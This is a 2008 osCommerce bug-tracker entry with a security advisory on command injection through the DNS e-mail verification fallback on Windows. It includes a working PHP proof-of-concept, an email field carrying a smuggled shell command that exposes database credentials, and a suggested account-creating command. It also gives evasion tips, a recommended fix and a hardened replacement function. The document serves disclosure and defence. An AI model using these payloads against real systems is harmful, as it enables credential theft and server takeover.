
Key: OSC-762
Type: Bug
Status: Closed
Resolution: Fixed
Priority: Major
Assignee: Harald Ponce de Leon
Reporter: WR
Votes: 0
Watchers: 0
osCommerce Core

Nearly arbitrary, remote code execution in osCommerce 2.2 RC2a on Windows with DNS e-mail verification enabled

Created: 12/Dec/08 11:53 AM   Updated: 12/Dec/08 11:55 AM
Component/s: Core Framework
Affects Version/s: 2.2 RC 2a
Fix Version/s: 2.2


Description
Nearly arbitrary, remote code execution in osCommerce 2.2 RC2a on Windows with
DNS e-mail verification enabled

Application: osCommerce Online Merchant 2.2 RC2a
CVE: ?
Severity: Moderate
Released: ?
Last modified: 28 XI 2008



Overview

osCommerce Online Merchant is one of the most popular e-commerce solutions; it
is a quick and simple way to set up a virtual shop.

osCommerce can be configured to check, using a DNS lookup, that the domain of an
e-mail address exists. This verification is disabled by default, but can be
enabled through the administration panel:

Configuration-->E-mail Options-->Verify E-mail addresses through DNS.

Verification is triggered wherever the system sends mail and is performed using
the PHP checkdnsrr function. For environments in which that function is not
available, a replacement is provided in the compatibility.php file. checkdnsrr is
not available on Windows PHP setups and possibly in some other environments
(PHP3?, blocked by the provider?).

The compatibility version of checkdnsrr takes the domain name to check and,
without escaping it for shell execution, appends it to an nslookup command. In
some places the domain name comes from the user, and even though it is
"validated" using a regular expression (see: functions/validations.php), it is
possible to inject code that will be executed on the host.

Setting or unsetting PHP directives such as register_globals or magic_quotes_gpc
does not mitigate this problem.



Proof of concept

1. Install a fresh copy of osCommerce 2.2 RC2a on Windows (e.g. using WAMP).
2. Enable e-mail verification.
3. Execute the following script (cURL extension required):

<?php

$a = 'http://www.example.com/catalog/contact_us.php?action=send';
$p = array();
$p['name'] = 'a';
$p['enquiry'] = 'a';
$p['email'] = "aaa@example.com&copy\tincludes\tt.txt&.aa";

$c = curl_init();
curl_setopt($c, CURLOPT_URL, $a);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS, $p);
curl_exec($c);
curl_close($c);

4. Check that the copy command worked by browsing to:

http://www.example.com/catalog/t.txt

The file should contain the contents of all files in the includes directory,
including the database credentials.

The command ("copy includes t.txt" above) can be replaced with something else,
like "net user aaa aaa /add"; it will be executed, so depending on the server's
permissions different things are possible. You have to avoid characters
disallowed by the domain validation, namely: space and []()<>@,;:.\". Replacing
spaces with tabs works on Windows, and "&" serves to separate multiple commands.



Recommendation

If you are hosted on Linux or have e-mail verification disabled, you most
probably do not have to worry. If there is no checkdnsrr in your environment,
disabling the verification is a quick fix.

Arguments should be escaped in the checkdnsrr compatibility function, for
example using the escapeshellarg function.
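As an added illustration of that recommendation (this is not osCommerce's
compatibility.php, nor the fix committed in r1838), below is a hardened shape for
an nslookup-based checkdnsrr fallback: the host is validated against a strict
hostname pattern before it goes anywhere near a shell, and escaped with
escapeshellarg regardless. It assumes nslookup is on the PATH and that a line of
nslookup output naming the record type is a good enough "record exists" signal;
the function name checkdnsrr_safe is my own.

```php
<?php
// Added example, not osCommerce code. Hardened fallback for environments
// without a native checkdnsrr(). Assumes nslookup is on the PATH.

function checkdnsrr_safe($host, $type = 'MX') {
    // 1. Only query record types we intend to support.
    $allowed_types = array('A', 'MX', 'NS', 'CNAME', 'ANY');
    $type = strtoupper($type);
    if (!in_array($type, $allowed_types, true)) {
        return false;
    }

    // 2. Reject anything that is not a plain hostname before it reaches a
    //    shell. The advisory's injection relies on "&" and tab characters,
    //    which the e-mail regex in functions/validations.php lets through;
    //    this check allows only labels of letters, digits and "-" separated
    //    by dots, so no whitespace and no shell metacharacters survive.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (strlen($host) > 253 ||
        !preg_match('/^(?:' . $label . '\.)*' . $label . '\.?$/', $host)) {
        return false;
    }

    // 3. Escape anyway, as defence in depth. escapeshellarg() quotes for the
    //    platform PHP runs on; on Windows it wraps the value in double quotes
    //    and replaces embedded double quotes, percent signs and exclamation
    //    marks with spaces.
    $cmd = 'nslookup -type=' . escapeshellarg($type) . ' ' . escapeshellarg($host);
    @exec($cmd, $output, $status);

    // 4. Assumption: treat a line mentioning the record type as a hit
    //    ("mail exchanger" is what nslookup prints for MX answers).
    $needle = ($type === 'MX') ? 'mail exchanger' : $type;
    foreach ($output as $line) {
        if (stripos($line, $needle) !== false) {
            return true;
        }
    }
    return false;
}

// Use the native function whenever it exists; PHP 5.3 and later ship
// checkdnsrr() on Windows as well.
if (!function_exists('checkdnsrr')) {
    function checkdnsrr($host, $type = 'MX') {
        return checkdnsrr_safe($host, $type);
    }
}
```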



PGP-Key

http://www.wrwrwr.org/public-pgp-key

pub 1024D/D33EE52B 2007-09-17
fingerprint 5FEA 4CB2 0866 698A 187D F2AA 7CE9 A5A6 D33E E52B



Copyright 2008 Wojtek Ruszczewski <security@wrwrwr.org>



Comments
Harald Ponce de Leon [12/Dec/08 11:55 AM]
Fixed in r1838. Thanks for the report!

Change by Harald Ponce de Leon [12/Dec/08 11:55 AM]

Field       Original Value   New Value
Status      Open [ 1 ]       Closed [ 6 ]
Resolution                   Fixed [ 1 ]